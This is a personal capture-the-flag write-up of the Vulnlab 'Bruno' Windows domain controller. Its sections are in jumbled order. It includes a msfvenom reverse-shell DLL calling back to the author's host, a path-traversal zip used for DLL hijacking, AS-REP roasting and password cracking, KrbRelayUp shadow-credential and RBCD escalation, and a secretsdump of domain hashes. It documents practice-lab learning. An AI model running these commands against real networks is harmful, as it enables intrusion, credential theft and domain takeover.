Here is my note on BRUNO box from Vulnlab.
BRUNO: 10.10.87.117
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22 04:55PM <DIR> app
| 06-29-22 04:33PM <DIR> benign
ftp> cd benign
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||62894|)
125 Data connection already open; Transfer starting.
06-29-22 04:32PM 4 test.exe
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd app
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||62901|)
150 Opening ASCII mode data connection.
06-29-22 05:42PM 165 changelog
06-28-22 07:15PM 431 SampleScanner.deps.json
06-29-22 03:58PM 7168 SampleScanner.dll
06-29-22 03:58PM 174592 SampleScanner.exe
06-28-22 07:15PM 170 SampleScanner.runtimeconfig.dev.json
06-28-22 07:15PM 154 SampleScanner.runtimeconfig.json
226 Transfer complete.
#Access-Denied.
SamppleScanner DLL Hijacking:
https://medium.com/@arz101/vulnlab-bruno-f0129f60ac40
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.71 LPORT=2222 -f dll > Microsoft.DiaSymReader.Native.amd64.dll
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# python2 evilarc.py Microsoft.DiaSymReader.Native.amd64.dll -p app -d 1
Creating evil.zip containing ..\app\Microsoft.DiaSymReader.Native.amd64.dll
#Then upload evil.zip to queue share from SMB service to gain a shell.
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# smbclient \\\\10.10.87.117\\queue -U "svc_net"
Password for [WORKGROUP\svc_net]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jan 27 11:58:28 2024
.. D 0 Wed Jun 29 09:41:03 2022
7863807 blocks of size 4096. 3737830 blocks available
smb: \> put evil.zip
putting file evil.zip as \evil.zip (15.0 kb/s) (average 15.0 kb/s)
smb: \> ls
. D 0 Sat Jan 27 12:47:13 2024
.. D 0 Wed Jun 29 09:41:03 2022
evil.zip A 9406 Sat Jan 27 12:47:13 2024
7863807 blocks of size 4096. 3737827 blocks available
smb: \>
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.0.71:2222
[*] Command shell session 1 opened (10.8.0.71:2222 -> 10.10.87.117:62242) at 2024-01-27 12:47:33 -0500
Shell Banner:
Microsoft Windows [Version 10.0.20348.768]
-----
C:\Windows\system32>whoami
whoami
bruno\svc_scan
C:\Windows\system32>
USER SHELL !
PRIV ESC:
KrbRelay and RBCD Privilege Escalation NOTES:
Prerequisites:
* LDAP signing not required on Domain Controller (default!)
* Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# crackmapexec ldap 10.10.87.117 -u svc_scan -p 'Sunshine1' -M maq
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.87.117 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
MAQ 10.10.87.117 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.87.117 389 BRUNODC MachineAccountQuota: 10
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# crackmapexec ldap 10.10.87.117 -u svc_scan -p 'Sunshine1' -M ldap-checker
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.87.117 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
LDAP-CHE... 10.10.87.117 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.87.117 389 BRUNODC Channel Binding is set to "NEVER" - Time to PWN!
.\KrbRelayUp.exe full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246
#Using Rubeus, to request a TGT for brunodc through PKINT authentication
Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGC...snip.... /password:tV0-oN8$aB7- /enctype:AES256 /nowrap
#Converting the kirbi format to ccache so we can use it with secretsdump.py:
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# cat bruno_ticket | base64 -d > bruno_ticket.kirbi
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# impacket-ticketConverter bruno_ticket.kirbi bruno_ticket.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# export KRB5CCNAME=./bruno_ticket.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# secretsdump.py 'brunodc$'@brunodc.bruno.vl -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d[REDIRECTED]
Privilege Escalation through Resource Based Constrained Delegation (RBCD):
.\KrbRelayUp.exe full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246
getST.py -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'hV1/xN0#aF8=yW1$' -spn HOST/BRUNODC
smbexec.py administrator@brunodc -k -no-pass
https://medium.com/@arz101/vulnlab-bruno-f0129f60ac40
https://vulndev.io/cheats-windows/
https://mayfly277.github.io/posts/GOADv2-pwning-part8/#krbrelay-up
https://github.com/Dec0ne/KrbRelayUp
https://github.com/gist/tothi/bf6c59d6de5d0c9710f23dae5750c4b9
ADMIN SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/29/2022 3:00 PM 37 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
FLAG.TXT: VL{REDIRECTED}
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/19/2021 6:24 AM EFI
d----- 6/29/2022 2:43 PM inetpub
d----- 5/8/2021 8:20 AM PerfLogs
d-r--- 6/29/2022 4:15 PM Program Files
d----- 6/29/2022 1:28 PM Program Files (x86)
d----- 6/29/2022 1:41 PM samples
d-r--- 6/29/2022 4:09 PM Users
d----- 6/29/2022 1:32 PM Windows
-a---- 6/29/2022 3:00 PM 37 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\>
FLAG.TXT: VL{REDIRECTED}
#No File Upload.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# cat changelog
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR string
#svc_scan user found, we are going to asreproast it.
| 06-29-22 01:41PM <DIR> malicious - EMPTY
|_06-29-22 04:33PM <DIR> queue - EMPTY
53/tcp open domain Simple DNS Plus
bloodhound-python -c all -u svc_net -p 'Sunshine1' -d bruno.vl -ns 10.10.87.117
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-27 16:17:38Z)
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# impacket-GetNPUsers -dc-ip 10.10.87.117 -request -outputfile hashes.asreproast bruno.vl/svc_scan
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:afe3beb60f73fa5f74c57c776e3a6756$90017b9267c63b96f010fa2f2aff301fc2e2ac5cf494554deef19713e6fad06e355e272970c5aadf89f6af8b3527c4208ce9736f8c051c87d2895ce11d099d8c6152d3d74adfe5a257931485245cbfdd89f29d0b4b5c2245ac1cea32d485a5dd0d4ba14605e92e10622266af86ea6e7dddc58bb7285f5bb2f4c80b0b6b57805591e6464875b69ea4ec3704d79d6cc33961ca9d79d1b3e2d5062e82e020c2c814972c4dfd383422ebe1ac8062ff756c0a1a47cc9763798d241f58f800bf3a67e5dd8052a5fc718a24488aaae5d76e24f6b152f3475c019b54d533af276b56bae82aba909b
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# sudo leafpad hash.txt
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sunshine1 ($krb5asrep$23$svc_scan@BRUNO.VL)
1g 0:00:00:00 DONE (2024-01-27 11:33) 8.333g/s 251733p/s 251733c/s 251733C/s sammy10..starrs
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_scan:Sunshine1
└─# sudo impacket-GetUserSPNs -request -dc-ip 10.10.87.117 bruno.vl/svc_scan
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------- -------- -------- -------------------------- -------------------------- ----------
NET/brunodc.bruno.vl svc_net 2022-06-29 09:35:45.023707 2022-06-29 12:29:25.394301
SCAN/brunodc.bruno.vl svc_scan 2022-06-29 09:36:15.210348 2024-01-27 11:34:28.017766
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sunshine1 (?)
Sunshine1 (?)
2g 0:00:00:00 DONE (2024-01-27 11:36) 6.060g/s 93090p/s 186181c/s 186181C/s sammy10..*star*
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_net:Sunshine1
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# sudo impacket-rpcdump @10.10.87.117 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# rpcclient --user="" -N 10.10.87.117
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getdompwinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u guest -p '' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [-] bruno.vl\guest: STATUS_ACCOUNT_DISABLED
-NOPE
-NO ANON CREDS.
-NO GUEST CREDS.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u users.txt -p 'Sunshine1' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [+] bruno.vl\svc_net:Sunshine1
SMB 10.10.87.117 445 BRUNODC [+] Enumerated shares
SMB 10.10.87.117 445 BRUNODC Share Permissions Remark
SMB 10.10.87.117 445 BRUNODC ----- ----------- ------
SMB 10.10.87.117 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.87.117 445 BRUNODC C$ Default share
SMB 10.10.87.117 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.87.117 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.87.117 445 BRUNODC NETLOGON READ Logon server share #NOTHING
SMB 10.10.87.117 445 BRUNODC queue READ,WRITE #Antivirus Enabled so No SCF ATTACK or SHELL ATTACKS.
SMB 10.10.87.117 445 BRUNODC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u svc_scan -p 'Sunshine1' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
SMB 10.10.87.117 445 BRUNODC [+] Enumerated shares
SMB 10.10.87.117 445 BRUNODC Share Permissions Remark
SMB 10.10.87.117 445 BRUNODC ----- ----------- ------
SMB 10.10.87.117 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.87.117 445 BRUNODC C$ Default share
SMB 10.10.87.117 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.87.117 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.87.117 445 BRUNODC NETLOGON READ Logon server share #NOTHING
SMB 10.10.87.117 445 BRUNODC queue READ,WRITE #Antivirus Enabled so No SCF ATTACK or SHELL ATTACKS.
SMB 10.10.87.117 445 BRUNODC SYSVOL READ Logon server share
SYSVOL:
┌──(root㉿kali)-[/home/…/BRUNO/10.10.87.117/JUNK/bruno.vl]
└─# tree .
.
├── DfsrPrivate
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ ├── Applications
│ │ ├── comment.cmtx #Interesting ? - NOPE
│ │ ├── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ ├── Registry.pol
│ │ └── Scripts
│ │ ├── Shutdown
│ │ └── Startup
│ └── USER
└── scripts
CertEnroll:
#It means there is a certifcate authority in this box so we are going to use certipy.
certipy find -vulnerable -stdout -u svc_net -p Sunshine1 -dc-ip 10.10.87.117
[*] Enumeration output:
Certificate Authorities
0
CA Name : bruno-BRUNODC-CA
DNS Name : brunodc.bruno.vl
Certificate Subject : CN=bruno-BRUNODC-CA, DC=bruno, DC=vl
Certificate Serial Number : 52D11B2B5CC276A54DE5B77F5E125E8D
Certificate Validity Start : 2022-06-29 13:23:01+00:00
Certificate Validity End : 2121-06-29 13:33:00+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : BRUNO.VL\Administrators
Access Rights
ManageCa : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
ManageCertificates : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
Enroll : BRUNO.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
-NOPE, A Rabbit Hole.
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:03+00:00; -1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after: 2121-06-29T13:33:00
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2024-01-26T16:16:27
|_Not valid after: 2024-07-27T16:16:27
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: BRUNO
| NetBIOS_Domain_Name: BRUNO
| NetBIOS_Computer_Name: BRUNODC
| DNS_Domain_Name: bruno.vl
| DNS_Computer_Name: brunodc.bruno.vl
| DNS_Tree_Name: bruno.vl
| Product_Version: 10.0.20348
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows